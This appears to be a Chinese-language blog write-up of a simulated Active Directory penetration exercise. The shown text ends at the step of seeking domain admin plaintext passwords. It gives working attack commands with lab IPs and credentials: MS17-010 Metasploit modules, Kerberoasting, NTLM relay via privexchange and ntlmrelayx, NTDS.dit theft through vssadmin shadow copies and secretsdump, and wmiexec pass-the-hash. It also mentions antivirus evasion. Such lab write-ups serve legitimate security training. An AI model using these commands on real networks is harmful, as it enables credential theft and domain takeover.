<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|sans-serif:300,300italic,400,400italic,700,700italic|Lato:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">


  <meta name="keywords" content="内网,系统安全,">





  <link rel="alternate" href="/atom.xml" title="RcoIl的窝" type="application/atom+xml">




  <link rel="shortcut icon" type="image/x-icon" href="/images/favicon.png?v=5.1.0">






<meta name="description" content="环境为模拟环境，文章使用的均为公开测试工具且未涉及到各个方法的原理。 分享便是我最好的老师。   ——Micropoor">
<meta name="keywords" content="内网,系统安全">
<meta property="og:type" content="article">
<meta property="og:title" content="内网练习（四）- 知识梳理">
<meta property="og:url" content="https://rcoil.me/2019/03/内网练习（四）/index.html">
<meta property="og:site_name" content="RcoIl的窝">
<meta property="og:description" content="环境为模拟环境，文章使用的均为公开测试工具且未涉及到各个方法的原理。 分享便是我最好的老师。   ——Micropoor">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://rcoil.me/image/内网练习（四）/初始网络拓扑.png">
<meta property="og:image" content="https://rcoil.me/image/内网练习（四）/blog_2019-03-25_16-37-30.png">
<meta property="og:image" content="https://rcoil.me/image/内网练习（四）/网络拓扑.png">
<meta property="og:updated_time" content="2019-04-10T06:37:28.261Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="内网练习（四）- 知识梳理">
<meta name="twitter:description" content="环境为模拟环境，文章使用的均为公开测试工具且未涉及到各个方法的原理。 分享便是我最好的老师。   ——Micropoor">
<meta name="twitter:image" content="https://rcoil.me/image/内网练习（四）/初始网络拓扑.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '6230266985318450000',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://rcoil.me/2019/03/内网练习（四）/">





  <title> 内网练习（四）- 知识梳理 | RcoIl的窝 </title>
</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ce3d1967864bac5f69f1c1a6042e5577";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">RcoIl的窝</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-count">
          <a href="/count" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-fa fa-free-code-camp"></i> <br>
            
            阅读榜
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope="" itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="https://rcoil.me/2019/03/内网练习（四）/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="RcoIl">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RcoIl的窝">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                内网练习（四）- 知识梳理
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-03-11T11:13:38+08:00">
                2019-03-11
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/内网渗透/" itemprop="url" rel="index">
                    <span itemprop="name">内网渗透</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2019/03/内网练习（四）/" class="leancloud_visitors" data-flag-title="内网练习（四）- 知识梳理">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                <!--
				<i class="fa fa-eye"></i>
				-->
				<i class="fa fa-thermometer-three-quarters" aria-hidden="true"></i>
               </span>
               
                 <span class="post-meta-item-text">热度 </span>
               
                 <span class="leancloud-visitors-count"></span>
				 <span>℃</span>
             </span>
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>环境为模拟环境，文章使用的均为公开测试工具且未涉及到各个方法的原理。</p>
<p>分享便是我最好的老师。   ——Micropoor</p>
<a id="more"></a>
<h1 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h1><p>在渗透测试中，经常会遇到一些奇奇怪怪的环境。本文所采用的环境是一个红蓝对抗靶场，以贴切实际环境为出发点。</p>
<ul>
<li>目的：摸清整个内网拓扑图、获取域控内的flag文件及指定域用户手中的flag。</li>
<li>提示：flag{ooxx-ooxx}</li>
</ul>
<ul>
<li><p>初始网络拓扑</p>
<p><img src="/image/内网练习（四）/初始网络拓扑.png" alt="初始网络拓扑"></p>
</li>
</ul>
<h1 id="0x01-靶机信息收集"><a href="#0x01-靶机信息收集" class="headerlink" title="0x01 靶机信息收集"></a>0x01 靶机信息收集</h1><p>因为是模拟环境，所以初始权限为<code>win7域用户权限</code>（上了RAT–&gt;http协议）。</p>
<ul>
<li><code>DKRST011</code>的基本信息</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">机器名: DKRST011</span><br><span class="line">权限: 域用户权限(rcoil\tk001)</span><br><span class="line">系统: Windows <span class="number">7</span> Professional <span class="number">6.1</span><span class="number">.7601</span> Service Pack <span class="number">1</span> Build <span class="number">7601</span> x64</span><br><span class="line">Domain: rcoil.local</span><br><span class="line">IP地址: <span class="number">172.16</span><span class="number">.238</span><span class="number">.29</span></span><br><span class="line">杀软: McAfee(非最新版)</span><br><span class="line">补丁情况：[*<span class="number">240</span>]</span><br><span class="line">.NET版本：V1<span class="number">.0</span>、V1<span class="number">.1</span>、V2<span class="number">.0</span>、V3<span class="number">.0</span>、V3<span class="number">.5</span>、V4<span class="number">.0</span></span><br><span class="line">已有操作: 密码拖取（需要未提权）、全盘文件列表获取、浏览器浏览记录及密码、TCP连接及进程等相关基础操作</span><br><span class="line">额为信息: <span class="number">192.168</span><span class="number">.5</span><span class="number">.6</span>:<span class="number">8080</span>为内网代理服务 --&gt; Linux</span><br></pre></td></tr></table></figure>
<p>在收集信息的时候发现<code>TCP连接</code>都是内网连接，而RAT的进程连接也是内网，感觉网络有问题。</p>
<p>探测出网情况：此机器为半脱网情况，<code>dns、icmp、udp均不可出来</code>，http与https协议可出网。所有出网程序连接均为<code>192.10.22.6:8080</code>，由此初步判断为代理出网情况，且是http无限制出网。</p>
<p>通过对带有password等关键字眼的文件进行搜索拖取，当作储备。</p>
<ul>
<li><strong>内网存活探测</strong></li>
</ul>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">- ICMP</span><br><span class="line">- SMB</span><br><span class="line">	172.16.88.0/16</span><br><span class="line">	192.168.5.0/16</span><br><span class="line"><span class="built_in">..</span><span class="built_in">..</span></span><br></pre></td></tr></table></figure>
<h1 id="0x02-对域内信息进行获取"><a href="#0x02-对域内信息进行获取" class="headerlink" title="0x02 对域内信息进行获取"></a>0x02 对域内信息进行获取</h1><p>从全盘文件列表中可看到<code>setspn</code>是存在的，但是在我进行对域信息进行收集的时候发现已经没了（两个操作之间隔着一段时间）。为了方便操作（<code>socks代理</code>），所以使用<code>Cobalt Strike</code>上线操作。</p>
<h2 id="1）问题（均为RAT上运行）"><a href="#1）问题（均为RAT上运行）" class="headerlink" title="1）问题（均为RAT上运行）"></a>1）问题（均为RAT上运行）</h2><ul>
<li><code>Cobalt Strike</code>免杀问题；</li>
<li><code>powerview</code>运行无反应（powershell、C#）；</li>
<li><code>Bloodhound/Sharphou</code>运行无反应；</li>
<li><code>setspn.exe</code> 被删除。</li>
</ul>
<h2 id="2）方案"><a href="#2）方案" class="headerlink" title="2）方案"></a>2）方案</h2><ul>
<li>免杀<code>shellcode</code>，使用加载器运行，<a href="https://github.com/Micropoor/Micro8/blob/master/payload%E5%88%86%E7%A6%BB%E5%85%8D%E6%9D%80%E6%80%9D%E8%B7%AF%E7%AC%AC%E4%BA%8C%E5%AD%A3%EF%BC%88%E7%AC%AC%E5%9B%9B%E5%8D%81%E5%85%AB%E8%AF%BE%EF%BC%89.pdf" target="_blank" rel="noopener">例子</a> ；</li>
<li><code>Cobalt Strike</code>的<code>execute-assembly</code>运行本地相应C#程序；</li>
<li>使用<a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py" target="_blank" rel="noopener">GetUserSPNs</a> 替换<code>setspn</code>使用；<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python GetUserSPNs.py -request -dc-ip <span class="number">192.10</span><span class="number">.22</span><span class="number">.22</span> pentestlab.com/rcoil</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h2 id="3）域信息的收集结果大致如下"><a href="#3）域信息的收集结果大致如下" class="headerlink" title="3）域信息的收集结果大致如下"></a>3）域信息的收集结果大致如下</h2><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">域控：</span><br><span class="line">	TTT<span class="number">-2</span>_172<span class="number">.16</span><span class="number">.88</span><span class="number">.21</span>_windows <span class="number">2016</span> x64 (主域控)</span><br><span class="line">	TTT-V_172<span class="number">.16</span><span class="number">.88</span><span class="number">.20</span>_windows <span class="number">2016</span> x64 (辅助域控)	</span><br><span class="line">域管理员：<span class="number">10</span>+</span><br><span class="line">域用户：<span class="number">200</span>+</span><br><span class="line">域内机器：<span class="number">150</span>+</span><br><span class="line">其他：略....</span><br></pre></td></tr></table></figure>
<h1 id="0x03-域控（域管理员）权限获取方法"><a href="#0x03-域控（域管理员）权限获取方法" class="headerlink" title="0x03 域控（域管理员）权限获取方法"></a>0x03 域控（域管理员）权限获取方法</h1><p>按照当前权限，梳理出一些知识点，大概可支持当前应用（知识串联）。</p>
<h2 id="1）-常规方法及结果"><a href="#1）-常规方法及结果" class="headerlink" title="1） 常规方法及结果"></a>1） 常规方法及结果</h2><ul>
<li><p><strong>组策略漏洞（GPP）</strong>–&gt; （MS14-025）</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">方法：</span><br><span class="line">	enum4linux -a -u tk001 -p P@ssw0rd <span class="number">172.16</span><span class="number">.88</span><span class="number">.21</span> (数据收集)</span><br><span class="line">	smbclient <span class="comment">//172.16.88.21/SYSVOL -U tk001</span></span><br><span class="line">	或者使用msf</span><br><span class="line">	auxiliary/scanner/smb/smb_enum_gpp</span><br><span class="line">[*] 结果：</span><br><span class="line">	失败（其实单单看是<span class="number">2016</span> server系统就知道不会成功）</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>MS17-010</strong></p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[*]msf</span><br><span class="line">	auxiliary<span class="meta-keyword">/admin/</span>smb/ms17_010_command         </span><br><span class="line">	auxiliary<span class="meta-keyword">/scanner/</span>smb/smb_ms17_010</span><br><span class="line">	exploit<span class="meta-keyword">/windows/</span>smb/ms17_010_eternalblue</span><br><span class="line">	exploit<span class="meta-keyword">/windows/</span>smb/ms17_010_eternalblue_win8</span><br><span class="line">	exploit<span class="meta-keyword">/windows/</span>smb/ms17_010_psexec</span><br><span class="line">[*] 结果：</span><br><span class="line">	TTT-V_172<span class="number">.16</span><span class="number">.88</span><span class="number">.20</span>成功执行命令</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>Kerberoasting</strong></p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">[*]GetUserSPNs.<span class="keyword">py</span></span><br><span class="line">	<span class="keyword">python</span> GetUserSPNs.<span class="keyword">py</span> -request -dc-ip <span class="number">192.10</span>.<span class="number">22.22</span> pentestlab.<span class="keyword">com</span>/rcoil </span><br><span class="line">关闭Kerberos预身份认证</span><br><span class="line">[*]Rubeus --&gt; http<span class="variable">s:</span>//github.<span class="keyword">com</span>/GhostPack/Rubeus</span><br><span class="line">	Rubeus.<span class="keyword">exe</span> asreproast # 枚举所有域用户（或者指定）Roasting AS-REPs</span><br><span class="line">[*] 结果:	</span><br><span class="line">	失败</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h2 id="2）-主流方法及结果"><a href="#2）-主流方法及结果" class="headerlink" title="2） 主流方法及结果"></a>2） 主流方法及结果</h2><ul>
<li><p><strong>基于资源约束委派</strong>(RBCD) –&gt; （未尝试）</p>
<figure class="highlight cs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[<span class="meta">*</span>] 条件：<span class="number">2012</span>+域控制器</span><br><span class="line">[<span class="meta">*</span>] powermad</span><br><span class="line">[<span class="meta">*</span>] powerview</span><br><span class="line">[<span class="meta">*</span>] Rubeus</span><br><span class="line">[<span class="meta">*</span>] SharpAllowedToAct</span><br><span class="line">	https:<span class="comment">//github.com/pkb1s/SharpAllowedToAct</span></span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>NTLM中继攻击</strong>（未尝试）</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[*] Responder</span><br><span class="line">	windows版本：https:<span class="regexp">//gi</span>thub.com<span class="regexp">/Kevin-Robertson/</span>Inveigh（修改函数名绕杀软等方法）</span><br><span class="line">	linux版本：https:<span class="regexp">//gi</span>thub.com<span class="regexp">/SpiderLabs/</span>Responder</span><br><span class="line">[*] mitm6+ntlmrelayx</span><br><span class="line">	https:<span class="regexp">//gi</span>thub.com<span class="regexp">/fox-it/mi</span>tm6</span><br><span class="line">	https:<span class="regexp">//gi</span>thub.com<span class="regexp">/SecureAuthCorp/im</span>packet<span class="regexp">/blob/m</span>aster<span class="regexp">/examples/</span>ntlmrelayx.py</span><br><span class="line">[*] CrackMapExec</span><br><span class="line">	https:<span class="regexp">//gi</span>thub.com<span class="regexp">/byt3bl33d3r/</span>CrackMapExec</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>Exchange</strong> （未启用Exchange）</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-attr">[*]</span> <span class="selector-tag">Privexchange</span></span><br><span class="line">	<span class="selector-tag">privexchange</span><span class="selector-class">.py</span> <span class="selector-tag">-ah</span> 172<span class="selector-class">.16</span><span class="selector-class">.238</span><span class="selector-class">.29</span> <span class="selector-tag">TTT-2</span><span class="selector-class">.rcoil</span><span class="selector-class">.local</span> <span class="selector-tag">-u</span> <span class="selector-tag">tk001</span> <span class="selector-tag">-d</span> <span class="selector-tag">rcoil</span><span class="selector-class">.local</span> <span class="selector-tag">-p</span> <span class="selector-tag">P</span>@<span class="keyword">ssw0rd</span>  # Privexchange.py对echange进行API调用</span><br><span class="line">	ntlmrelayx.py -t ldap://<span class="number">172.16</span>.<span class="number">88.21</span> --escalate-user tk001 # ntlmrelayx将Exchange服务器的凭据中继到主DC，然后升级tk001的权限</span><br><span class="line">	secretsdump.py rcoil/tk001@TTT-<span class="number">2</span>.rcoil.local -just-dc</span><br><span class="line"></span><br><span class="line">[*] Exchange2domain --&gt; 一体化的privexchange工具</span><br><span class="line">	https://github.com/Ridter/Exchange2domain</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h2 id="3）-辅助工具"><a href="#3）-辅助工具" class="headerlink" title="3） 辅助工具"></a>3） 辅助工具</h2><ul>
<li><a href="https://github.com/BloodHoundAD/BloodHound" target="_blank" rel="noopener">BloodHound</a> –&gt; 映射出活动目录关系</li>
<li><a href="https://github.com/hausec/ADAPE-Script" target="_blank" rel="noopener">ADAPE-Script </a> –&gt; AD评估和权限提升脚本</li>
<li><a href="https://raw.githubusercontent.com/samratashok/nishang/master/Escalation/Invoke-PsUACme.ps1" target="_blank" rel="noopener">Invoke-PsUACme</a> –&gt; 绕过UAC</li>
<li><a href="https://github.com/byt3bl33d3r/CrackMapExec" target="_blank" rel="noopener">CrackMapExec</a> –&gt;  查找特权帐户等等等利用</li>
<li><a href="https://github.com/byt3bl33d3r/SILENTTRINITY" target="_blank" rel="noopener">SILENTTRINITY</a> –&gt;  后期利用</li>
<li>….</li>
</ul>
<p>除了以上这些点，还有很多方法，最无脑的就是查看当前用户具有读权限的域内所有共享，信息收集，翻一轮、</p>
<figure class="highlight coq"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[*] powerview</span><br><span class="line">Find-DomainShare -CheckShareAccess | <span class="type">fl</span> | <span class="type">Out</span>-<span class="keyword">File</span> domain-shares.txt</span><br><span class="line">[*] 略....</span><br></pre></td></tr></table></figure>
<h1 id="0x04-域控权限"><a href="#0x04-域控权限" class="headerlink" title="0x04 域控权限"></a>0x04 域控权限</h1><p><code>TTT-V_172.16.88.20</code>使用<code>MS17-010</code>成功执行命令。</p>
<p>域控信息：</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">机器名: TTT-V</span><br><span class="line">权限: 域控权限</span><br><span class="line">系统: Windows Server <span class="number">2016</span> Standard <span class="number">10.0</span><span class="meta">.14393</span> N/A Build <span class="number">14393</span> x64</span><br><span class="line">OS Configuration: Additional/Backup Domain Controller</span><br><span class="line"><span class="symbol">Domain:</span> rcoil.local</span><br><span class="line"><span class="built_in">IP</span>地址: <span class="number">172.16</span><span class="meta">.88</span><span class="meta">.20</span></span><br><span class="line">杀软: McAfee(非最新版)</span><br><span class="line">补丁情况：[*<span class="number">2</span>]</span><br><span class="line"><span class="meta">.NET</span>版本：V1<span class="meta">.0</span>、V1<span class="meta">.1</span>、V2<span class="meta">.0</span>、V3<span class="meta">.0</span>、V3<span class="meta">.5</span>、V4<span class="meta">.0</span></span><br><span class="line">端口情况：无Web --&gt; TTT-<span class="number">2_172.16</span><span class="meta">.88</span><span class="meta">.21</span>存在<span class="number">80</span>端口IIS服务</span><br><span class="line">域信任关系：rcoil.local（root）</span><br><span class="line">		   demo.rcoil.local</span><br></pre></td></tr></table></figure>
<p>往下的思路是这样的：</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-attr">[*]</span> 本机<span class="selector-tag">flag</span>获取</span><br><span class="line"><span class="selector-attr">[*]</span> 在<span class="selector-tag">TTT-V</span>机器上拖取<span class="selector-tag">NTDS</span><span class="selector-class">.dit</span>文件，本地恢复获取域内所有用户<span class="selector-tag">hash</span>。当然，能获取到明文是最好的。</span><br><span class="line"><span class="selector-attr">[*]</span> 使用<span class="selector-tag">CrackMapExec</span>、<span class="selector-tag">wmiexec</span>等工具执行相关操作（重点：以域管权限启动<span class="selector-tag">CS</span>，后使用<span class="selector-tag">PTH</span>攻击 <span class="selector-tag">--</span>&gt; 简直完美）。</span><br></pre></td></tr></table></figure>
<h2 id="1）实施"><a href="#1）实施" class="headerlink" title="1）实施"></a>1）实施</h2><ul>
<li><p><strong>flag获取</strong></p>
<figure class="highlight mathematica"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[*] dir</span><br><span class="line">	dir /s flag</span><br><span class="line">[*] powerview(可选)</span><br><span class="line">	Invoke-Filefinder -Threads <span class="number">100</span> -<span class="keyword">Verbose</span> -Terms flag -IncludeC -OutFile <span class="keyword">C</span>:\Windows\Temp\flags.txt</span><br><span class="line">	</span><br><span class="line">flag&#123;Genius_only_means_hard-working_all_one's_life&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>直接反弹<code>MS17-010</code>的shell进行操作</strong></p>
<figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">bind_tcp</span> --&gt;</span> 失败</span><br><span class="line"><span class="function"><span class="title">bind_pipe</span> --&gt;</span> 失败</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>IPC操作</strong></p>
<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">[*]</span> 不建议之操作</span><br><span class="line">	添加添加系统隐藏账号密码进行IPC一系列操作</span><br><span class="line"><span class="string">[*]</span> 域管权限</span><br><span class="line">	直接从域控IPC到DKRST011进行工具复制 --&gt; 拒绝访问</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>NTDS.dit</strong></p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">vssadmin create shadow /for=c: </span><br><span class="line">copy <span class="symbol">\\</span>?<span class="symbol">\G</span>LOBALROOT<span class="symbol">\D</span>evice<span class="symbol">\H</span>arddiskVolumeShadowCopy1<span class="symbol">\w</span>indows<span class="symbol">\N</span>TDS<span class="symbol">\N</span>TDS.dit c:<span class="symbol">\w</span>indows<span class="symbol">\t</span>emp<span class="symbol">\n</span>tds.dit </span><br><span class="line">copy <span class="symbol">\\</span>?<span class="symbol">\G</span>LOBALROOT<span class="symbol">\D</span>evice<span class="symbol">\H</span>arddiskVolumeShadowCopy1<span class="symbol">\w</span>indows<span class="symbol">\s</span>ystem32<span class="symbol">\c</span>onfig<span class="symbol">\S</span>YSTEM c:<span class="symbol">\w</span>indows<span class="symbol">\t</span>emp<span class="symbol">\s</span>ystem.hive</span><br><span class="line">vssadmin delete shadows /shadow=&#123;1xxxxx0b-e47d-xxxx-969f-8xxa4xxxx0xx&#125; /quiet</span><br><span class="line">最后通过 //172.16.88.21/SYSVOL 拖到 DKRST011 机器，本地恢复</span><br><span class="line">python secretsdump.py -ntds /root/ntds.dit -system /root/SYSTEM LOCAL</span><br><span class="line"></span><br><span class="line">域管理员的password为hash格式。</span><br><span class="line"></span><br><span class="line">后使用 CrackMapExec、wmiexec等工具进行进一步测试。</span><br></pre></td></tr></table></figure>
<p><strong>注：</strong>调用<code>Volume Shadow Copy</code>服务会产生日志文件，位于System下，<code>Event ID为7036</code></p>
</li>
</ul>
<h2 id="2）遇到问题"><a href="#2）遇到问题" class="headerlink" title="2）遇到问题"></a>2）遇到问题</h2><p>执行以下命令：<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmiexec<span class="selector-class">.py</span> -hashes LMHASH:NTHASH rcoil/administrator@<span class="number">172.16</span>.<span class="number">238.29</span> <span class="string">"c:\\payload.exe"</span></span><br></pre></td></tr></table></figure></p>
<p><code>Cobalt Strike</code>未上线，这个情况其实是第一次见。</p>
<p>以多种形式的<code>payload</code>运行也无果。</p>
<p>确认非协议问题，因为以同样的程序，在域用户权限下正常启动并上线。</p>
<h2 id="3）方案"><a href="#3）方案" class="headerlink" title="3）方案"></a>3）方案</h2><ul>
<li>获取明文密码，计划任务启动；</li>
<li>添加<code>HKLM自启注册表</code></li>
</ul>
<h1 id="0x05-获取域管明文密码"><a href="#0x05-获取域管明文密码" class="headerlink" title="0x05 获取域管明文密码"></a>0x05 获取域管明文密码</h1><p>使用<code>powerview</code>查询域管登陆过的机器：<br><figure class="highlight vala"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># Find-DomainUserLocation == old Invoke-UserHunter</span></span><br><span class="line"><span class="meta"># enumerate servers that allow unconstrained Kerberos delegation and show all users logged in</span></span><br><span class="line">Find-DomainUserLocation -ComputerUnconstrained -ShowAll</span><br></pre></td></tr></table></figure></p>
<p>最后选择了<code>172.16.10.29</code>的<code>win 2008 server</code>的机器，而且这台机器上存在<code>AdAudit Plus</code>。</p>
<p><img src="/image/内网练习（四）/blog_2019-03-25_16-37-30.png" alt="blog_2019-03-25_16-37-30"></p>
